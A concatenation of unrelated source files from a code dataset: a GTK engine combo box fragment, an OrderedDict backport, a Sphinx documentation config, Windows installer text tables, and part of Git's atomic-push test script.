renderer.set_property("sensitive", False)
else:
renderer.set_property("visible", True)
renderer.set_property("sensitive", True)
pixbuf = load_icon(engine.get_icon(), Gtk.IconSize.LARGE_TOOLBAR)
renderer.set_property("pixbuf", pixbuf)
def __name_cell_data_cb(self, celllayout, renderer, model, iter, data):
engine = self.__model.get_value(iter, 0)
if isinstance (engine, str) or isinstance (engine, unicode):
renderer.set_property("sensitive", False)
renderer.set_property("text", engine)
renderer.set_property("weight", Pango.Weight.NORMAL)
elif isinstance(engine, int):
renderer.set_property("sensitive", True)
renderer.set_property("text", _("Select an input method"))
renderer.set_property("weight", Pango.Weight.NORMAL)
else:
renderer.set_property("sensitive", True)
renderer.set_property("text", engine.get_longname())
renderer.set_property("weight",
Pango.Weight.BOLD if engine.get_rank() > 0 else Pango.Weight.NORMAL)
def __notify_active_cb(self, combobox, property):
self.notify("active-engine")
def do_get_property(self, property):
if property.name == "active-engine":
i = self.get_active()
if i == 0 or i == -1:
return None
iter = self.get_active_iter()
return self.get_model()[iter][0]
else:
raise AttributeError, 'unknown property %s' % property.name
def get_active_engine(self):
return self.get_property("active-engine")
if __name__ == "__main__":
combo = EngineComboBox()
combo.set_engines([IBus.EngineDesc(language="zh")])
w = Gtk.Window()
w.add(combo)
w.show_all()
Gtk.main() | unknown | codeparrot/codeparrot-clean | ||
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self) | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#
# Empear Enterprise Edition documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 23 16:50:32 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
import os
import subprocess
from datetime import date
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
def get_git_rev():
return subprocess.Popen("git rev-parse --short HEAD", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
def get_version():
version_env = os.environ.get("VERSION")
if version_env:
return version_env
else:
return get_git_rev()
version = get_version()
# The full version, including alpha/beta/rc tags.
release = version
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
]
numfig = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hyper'
copyright = u'2016-{0} Oskar Wickström'.format(date.today().year)
author = u'Oskar Wickström'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'xcode'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'theme' # use the theme in subdir 'theme'
html_theme_path = ['.'] # make sphinx search for themes in current dir
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
}
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
html_title = u'Hyper — Type-safe, statically checked composition of HTTP servers'
# A shorter title for the navigation bar. Default is the same as html_title.
#
html_short_title = u'Hyper'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = 'logo.png'
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = 'favicon.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
html_domain_indices = False
# If false, no index is generated.
#
html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
html_show_sourcelink = False
# If true, the reST sources are included in the HTML build as _sources/name. The
# default is True.
html_copy_source = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
html_use_opensearch = 'http://hyper.wickstrom.tech'
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Hyper'
# -- Options for LaTeX output ---------------------------------------------
latex_preamble = r'''
\usepackage{lmodern}
\usepackage[T1]{fontenc}
%
\usepackage{fancyhdr}
\fancypagestyle{plain}{%
\renewcommand{\headrulewidth}{0pt}%
\fancyhf{}%
\fancyfoot[C]{\textsf{\thepage}}
}
\pagestyle{fancy}
\fancyhf{}
\fancyhead[C]{\textsf{\bfseries{\leftmark}}}
\fancyfoot[C]{\textsf{\thepage}}
\renewcommand{\footrulewidth}{0pt}
\renewcommand{\headrulewidth}{0pt}
%
\usepackage[font={small,it}]{caption}
\titleformat{\chapter}[display]
{\normalfont\sffamily\huge\bfseries\color{black}}
{\chaptertitlename\ \thechapter}{20pt}{\Huge}
\titleformat{\section}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesection}{1em}{}
\titleformat{\subsection}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesubsection}{1em}{}
\titleformat{\subsubsection}
{\normalfont\sffamily\normalsize\bfseries\color{black}}
{\thesubsubsection}{1em}{}
\titleformat{\paragraph}{\normalfont\normalsize\slshape}{\theparagraph}{1em}{}
% \hypersetup{colorlinks = false}
%
\usepackage{enumitem}
\setlist[description]{style=nextline}
\renewcommand{\descriptionlabel}[1]{\hspace{\labelsep}\emph{#1}}
'''
latex_title_page = r'''
\begin{titlepage}
\vspace*{\fill}
\begin{center}
\includegraphics[width=0.5\textwidth]{_static/hyper@2x.png}\par
\vspace{1cm}
{\Large\text{Type-safe, statically checked composition of HTTP servers}\par}
\vspace{2cm}
{\Large\version\par}
\vspace{2cm}
{\Large\itshape \today\par}
\end{center}
\vspace*{\fill}
\end{titlepage}
'''
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
'papersize': 'a4paper',
# The font size ('10pt', '11pt' or '12pt').
#
'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': latex_preamble,
# Latex figure (float) alignment
#
#'figure_align': 'htbp',
'fontpkg': '',
'fncychap': '',
'releasename': 'Version',
'sphinxsetup': 'verbatimwithframe=false',
'maketitle': latex_title_page,
}
latex_show_pagerefs = True
latex_show_url = 'footnote'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'hyper.tex', u'Hyper Documentation',
u'Oskar Wickström', 'report'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual /ection).
man_pages = [
(master_doc, 'Hyper', u'Hyper Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Hyper', u'Hyper Documentation',
author, 'Hyper', 'Type-safe, statically checked composition of HTTP servers',
'Web'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
# epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#
# epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#
# epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#
# epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#
# epub_tocdepth = 3
# Allow duplicate toc entries.
#
# epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#
# epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#
# epub_fix_images = False
# Scale large images.
#
# epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# epub_show_urls = 'inline'
# If false, no index is generated.
#
# epub_use_index = True | unknown | codeparrot/codeparrot-clean | ||
import msilib,os;dirname=os.path.dirname(__file__)
ActionText = [
('InstallValidate', 'Validating install', None),
('InstallFiles', 'Copying new files', 'File: [1], Directory: [9], Size: [6]'),
('InstallAdminPackage', 'Copying network install files', 'File: [1], Directory: [9], Size: [6]'),
('FileCost', 'Computing space requirements', None),
('CostInitialize', 'Computing space requirements', None),
('CostFinalize', 'Computing space requirements', None),
('CreateShortcuts', 'Creating shortcuts', 'Shortcut: [1]'),
('PublishComponents', 'Publishing Qualified Components', 'Component ID: [1], Qualifier: [2]'),
('PublishFeatures', 'Publishing Product Features', 'Feature: [1]'),
('PublishProduct', 'Publishing product information', None),
('RegisterClassInfo', 'Registering Class servers', 'Class Id: [1]'),
('RegisterExtensionInfo', 'Registering extension servers', 'Extension: [1]'),
('RegisterMIMEInfo', 'Registering MIME info', 'MIME Content Type: [1], Extension: [2]'),
('RegisterProgIdInfo', 'Registering program identifiers', 'ProgId: [1]'),
('AllocateRegistrySpace', 'Allocating registry space', 'Free space: [1]'),
('AppSearch', 'Searching for installed applications', 'Property: [1], Signature: [2]'),
('BindImage', 'Binding executables', 'File: [1]'),
('CCPSearch', 'Searching for qualifying products', None),
('CreateFolders', 'Creating folders', 'Folder: [1]'),
('DeleteServices', 'Deleting services', 'Service: [1]'),
('DuplicateFiles', 'Creating duplicate files', 'File: [1], Directory: [9], Size: [6]'),
('FindRelatedProducts', 'Searching for related applications', 'Found application: [1]'),
('InstallODBC', 'Installing ODBC components', None),
('InstallServices', 'Installing new services', 'Service: [2]'),
('LaunchConditions', 'Evaluating launch conditions', None),
('MigrateFeatureStates', 'Migrating feature states from related applications', 'Application: [1]'),
('MoveFiles', 'Moving files', 'File: [1], Directory: [9], Size: [6]'),
('PatchFiles', 'Patching files', 'File: [1], Directory: [2], Size: [3]'),
('ProcessComponents', 'Updating component registration', None),
('RegisterComPlus', 'Registering COM+ Applications and Components', 'AppId: [1]{{, AppType: [2], Users: [3], RSN: [4]}}'),
('RegisterFonts', 'Registering fonts', 'Font: [1]'),
('RegisterProduct', 'Registering product', '[1]'),
('RegisterTypeLibraries', 'Registering type libraries', 'LibID: [1]'),
('RegisterUser', 'Registering user', '[1]'),
('RemoveDuplicateFiles', 'Removing duplicated files', 'File: [1], Directory: [9]'),
('RemoveEnvironmentStrings', 'Updating environment strings', 'Name: [1], Value: [2], Action [3]'),
('RemoveExistingProducts', 'Removing applications', 'Application: [1], Command line: [2]'),
('RemoveFiles', 'Removing files', 'File: [1], Directory: [9]'),
('RemoveFolders', 'Removing folders', 'Folder: [1]'),
('RemoveIniValues', 'Removing INI files entries', 'File: [1], Section: [2], Key: [3], Value: [4]'),
('RemoveODBC', 'Removing ODBC components', None),
('RemoveRegistryValues', 'Removing system registry values', 'Key: [1], Name: [2]'),
('RemoveShortcuts', 'Removing shortcuts', 'Shortcut: [1]'),
('RMCCPSearch', 'Searching for qualifying products', None),
('SelfRegModules', 'Registering modules', 'File: [1], Folder: [2]'),
('SelfUnregModules', 'Unregistering modules', 'File: [1], Folder: [2]'),
('SetODBCFolders', 'Initializing ODBC directories', None),
('StartServices', 'Starting services', 'Service: [1]'),
('StopServices', 'Stopping services', 'Service: [1]'),
('UnpublishComponents', 'Unpublishing Qualified Components', 'Component ID: [1], Qualifier: [2]'),
('UnpublishFeatures', 'Unpublishing Product Features', 'Feature: [1]'),
('UnregisterClassInfo', 'Unregister Class servers', 'Class Id: [1]'),
('UnregisterComPlus', 'Unregistering COM+ Applications and Components', 'AppId: [1]{{, AppType: [2]}}'),
('UnregisterExtensionInfo', 'Unregistering extension servers', 'Extension: [1]'),
('UnregisterFonts', 'Unregistering fonts', 'Font: [1]'),
('UnregisterMIMEInfo', 'Unregistering MIME info', 'MIME Content Type: [1], Extension: [2]'),
('UnregisterProgIdInfo', 'Unregistering program identifiers', 'ProgId: [1]'),
('UnregisterTypeLibraries', 'Unregistering type libraries', 'LibID: [1]'),
('WriteEnvironmentStrings', 'Updating environment strings', 'Name: [1], Value: [2], Action [3]'),
('WriteIniValues', 'Writing INI files values', 'File: [1], Section: [2], Key: [3], Value: [4]'),
('WriteRegistryValues', 'Writing system registry values', 'Key: [1], Name: [2], Value: [3]'),
('Advertise', 'Advertising application', None),
('GenerateScript', 'Generating script operations for action:', '[1]'),
('InstallSFPCatalogFile', 'Installing system catalog', 'File: [1], Dependencies: [2]'),
('MsiPublishAssemblies', 'Publishing assembly information', 'Application Context:[1], Assembly Name:[2]'),
('MsiUnpublishAssemblies', 'Unpublishing assembly information', 'Application Context:[1], Assembly Name:[2]'),
('Rollback', 'Rolling back action:', '[1]'),
('RollbackCleanup', 'Removing backup files', 'File: [1]'),
('UnmoveFiles', 'Removing moved files', 'File: [1], Directory: [9]'),
('UnpublishProduct', 'Unpublishing product information', None),
]
UIText = [
('AbsentPath', None),
('bytes', 'bytes'),
('GB', 'GB'),
('KB', 'KB'),
('MB', 'MB'),
('MenuAbsent', 'Entire feature will be unavailable'),
('MenuAdvertise', 'Feature will be installed when required'),
('MenuAllCD', 'Entire feature will be installed to run from CD'),
('MenuAllLocal', 'Entire feature will be installed on local hard drive'),
('MenuAllNetwork', 'Entire feature will be installed to run from network'),
('MenuCD', 'Will be installed to run from CD'),
('MenuLocal', 'Will be installed on local hard drive'),
('MenuNetwork', 'Will be installed to run from network'),
('ScriptInProgress', 'Gathering required information...'),
('SelAbsentAbsent', 'This feature will remain uninstalled'),
('SelAbsentAdvertise', 'This feature will be set to be installed when required'),
('SelAbsentCD', 'This feature will be installed to run from CD'),
('SelAbsentLocal', 'This feature will be installed on the local hard drive'),
('SelAbsentNetwork', 'This feature will be installed to run from the network'),
('SelAdvertiseAbsent', 'This feature will become unavailable'),
('SelAdvertiseAdvertise', 'Will be installed when required'),
('SelAdvertiseCD', 'This feature will be available to run from CD'),
('SelAdvertiseLocal', 'This feature will be installed on your local hard drive'),
('SelAdvertiseNetwork', 'This feature will be available to run from the network'),
('SelCDAbsent', "This feature will be uninstalled completely, you won't be able to run it from CD"),
('SelCDAdvertise', 'This feature will change from run from CD state to set to be installed when required'),
('SelCDCD', 'This feature will remain to be run from CD'),
('SelCDLocal', 'This feature will change from run from CD state to be installed on the local hard drive'),
('SelChildCostNeg', 'This feature frees up [1] on your hard drive.'),
('SelChildCostPos', 'This feature requires [1] on your hard drive.'),
('SelCostPending', 'Compiling cost for this feature...'),
('SelLocalAbsent', 'This feature will be completely removed'),
('SelLocalAdvertise', 'This feature will be removed from your local hard drive, but will be set to be installed when required'),
('SelLocalCD', 'This feature will be removed from your local hard drive, but will be still available to run from CD'),
('SelLocalLocal', 'This feature will remain on you local hard drive'),
('SelLocalNetwork', 'This feature will be removed from your local hard drive, but will be still available to run from the network'),
('SelNetworkAbsent', "This feature will be uninstalled completely, you won't be able to run it from the network"),
('SelNetworkAdvertise', 'This feature will change from run from network state to set to be installed when required'),
('SelNetworkLocal', 'This feature will change from run from network state to be installed on the local hard drive'),
('SelNetworkNetwork', 'This feature will remain to be run from the network'),
('SelParentCostNegNeg', 'This feature frees up [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures free up [4] on your hard drive.'),
('SelParentCostNegPos', 'This feature frees up [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures require [4] on your hard drive.'),
('SelParentCostPosNeg', 'This feature requires [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures free up [4] on your hard drive.'),
('SelParentCostPosPos', 'This feature requires [1] on your hard drive. It has [2] of [3] subfeatures selected. The subfeatures require [4] on your hard drive.'),
('TimeRemaining', 'Time remaining: {[1] minutes }{[2] seconds}'),
('VolumeCostAvailable', 'Available'),
('VolumeCostDifference', 'Difference'),
('VolumeCostRequired', 'Required'),
('VolumeCostSize', 'Disk Size'),
('VolumeCostVolume', 'Volume'),
]
tables=['ActionText', 'UIText'] | unknown | codeparrot/codeparrot-clean | ||
#!/bin/sh
test_description='pushing to a repository using the atomic push option'
GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main
export GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME
. ./test-lib.sh
mk_repo_pair () {
rm -rf workbench upstream &&
test_create_repo upstream &&
test_create_repo workbench &&
(
cd upstream &&
git config receive.denyCurrentBranch warn
) &&
(
cd workbench &&
git remote add up ../upstream
)
}
# Compare the ref ($1) in upstream with a ref value from workbench ($2)
# i.e. test_refs second HEAD@{2}
test_refs () {
test $# = 2 &&
git -C upstream rev-parse --verify "$1" >expect &&
git -C workbench rev-parse --verify "$2" >actual &&
test_cmp expect actual
}
fmt_status_report () {
sed -n \
-e "/^To / { s/ */ /g; p; }" \
-e "/^ ! / { s/ */ /g; p; }"
}
test_expect_success 'atomic push works for a single branch' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git push --mirror up &&
test_commit two &&
git push --atomic up main
) &&
test_refs main main
'
test_expect_success 'atomic push works for two branches' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch second &&
git push --mirror up &&
test_commit two &&
git checkout second &&
test_commit three &&
git push --atomic up main second
) &&
test_refs main main &&
test_refs second second
'
test_expect_success 'atomic push works in combination with --mirror' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second &&
test_commit two &&
git push --atomic --mirror up
) &&
test_refs main main &&
test_refs second second
'
test_expect_success 'atomic push works in combination with --force' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch second main &&
test_commit two_a &&
git checkout second &&
test_commit two_b &&
test_commit three_b &&
test_commit four &&
git push --mirror up &&
# The actual test is below
git checkout main &&
test_commit three_a &&
git checkout second &&
git reset --hard HEAD^ &&
git push --force --atomic up main second
) &&
test_refs main main &&
test_refs second second
'
# set up two branches where main can be pushed but second can not
# (non-fast-forward). Since second can not be pushed the whole operation
# will fail and leave main untouched.
test_expect_success 'atomic push fails if one branch fails' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
test_commit three &&
test_commit four &&
git push --mirror up &&
git reset --hard HEAD~2 &&
test_commit five &&
git checkout main &&
test_commit six &&
test_must_fail git push --atomic --all up >output-all 2>&1 &&
# --all and --branches have the same behavior when be combined with --atomic
test_must_fail git push --atomic --branches up >output-branches 2>&1 &&
test_cmp output-all output-branches
) &&
test_refs main HEAD@{7} &&
test_refs second HEAD@{4}
'
test_expect_success 'atomic push fails if one tag fails remotely' '
# prepare the repo
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
git push --mirror up
) &&
# a third party modifies the server side:
(
cd upstream &&
git checkout second &&
git tag test_tag second
) &&
# see if we can now push both branches.
(
cd workbench &&
git checkout main &&
test_commit three &&
git checkout second &&
test_commit four &&
git tag test_tag &&
test_must_fail git push --tags --atomic up main second
) &&
test_refs main HEAD@{3} &&
test_refs second HEAD@{1}
'
test_expect_success 'atomic push obeys update hook preventing a branch to be pushed' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git checkout -b second main &&
test_commit two &&
git push --mirror up
) &&
test_hook -C upstream update <<-\EOF &&
# only allow update to main from now on
test "$1" = "refs/heads/main"
EOF
(
cd workbench &&
git checkout main &&
test_commit three &&
git checkout second &&
test_commit four &&
test_must_fail git push --atomic up main second
) &&
test_refs main HEAD@{3} &&
test_refs second HEAD@{1}
'
test_expect_success 'atomic push is not advertised if configured' '
mk_repo_pair &&
(
cd upstream &&
git config receive.advertiseatomic 0
) &&
(
cd workbench &&
test_commit one &&
git push --mirror up &&
test_commit two &&
test_must_fail git push --atomic up main
) &&
test_refs main HEAD@{1}
'
# References in upstream : main(1) one(1) foo(1)
# References in workbench: main(2) foo(1) two(2) bar(2)
# Atomic push : main(2) two(2) bar(2)
test_expect_success 'atomic push reports (reject by update hook)' '
mk_repo_pair &&
(
cd workbench &&
test_commit one &&
git branch foo &&
git push up main one foo &&
git tag -d one
) &&
(
